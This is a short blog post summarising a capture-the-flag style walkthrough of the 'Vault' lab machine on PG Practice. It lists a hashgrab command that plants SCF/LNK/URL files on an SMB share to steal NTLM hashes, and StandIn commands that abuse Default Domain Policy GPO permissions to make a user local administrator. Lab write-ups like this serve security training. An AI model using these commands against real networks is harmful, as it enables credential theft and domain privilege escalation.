Post

Stealing Hashes with Responder, GPO Permissions & Unintended Ways - Vault @ PG Practice

Stealing Hashes with Responder, GPO Permissions & Unintended Ways - Vault @ PG Practice

We are solving Vault from PG Practice. This machine involves planting malicious files on an SMB share to steal hashes. For root, we will abuse GPO Permissions and explore 2 unintended privilege escalations.

Notes

Creating scf/lnk/url files via hashgrab:

1
python3 ~/tools/hashgrab/hashgrab.py <ip> xct

GPO Abuse via standin:

1
2
3
4
.\standin --gpo
.\standin --gpo --filter "Default Domain Policy" --acl
.\standin --gpo --filter "Default Domain Policy" --localadmin anirudh
cmd /c "gpupdate /force"

Other resources:

This post is licensed under CC BY 4.0 by the author.